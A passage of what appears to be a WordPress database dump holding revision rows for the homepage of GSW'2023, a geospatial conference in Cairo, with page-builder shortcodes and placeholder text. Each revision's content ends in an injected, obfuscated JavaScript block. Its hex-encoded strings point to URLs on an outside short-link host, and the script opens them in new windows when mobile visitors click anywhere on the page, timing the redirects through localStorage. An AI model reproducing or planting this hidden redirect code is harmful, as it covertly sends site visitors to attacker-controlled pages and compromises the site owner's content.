_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:29:32','2022-11-09 15:29:32','',3066,'https://gsw2023.com/?p=3141',0,'revision','',0),
(3142,1,'2022-11-09 15:30:30','2022-11-09 15:30:30','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668007819032{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668007827903{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:30:30','2022-11-09 15:30:30','',3066,'https://gsw2023.com/?p=3142',0,'revision','',0),
(3143,1,'2022-11-09 15:34:18','2022-11-09 15:34:18','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668007819032{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668007827903{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 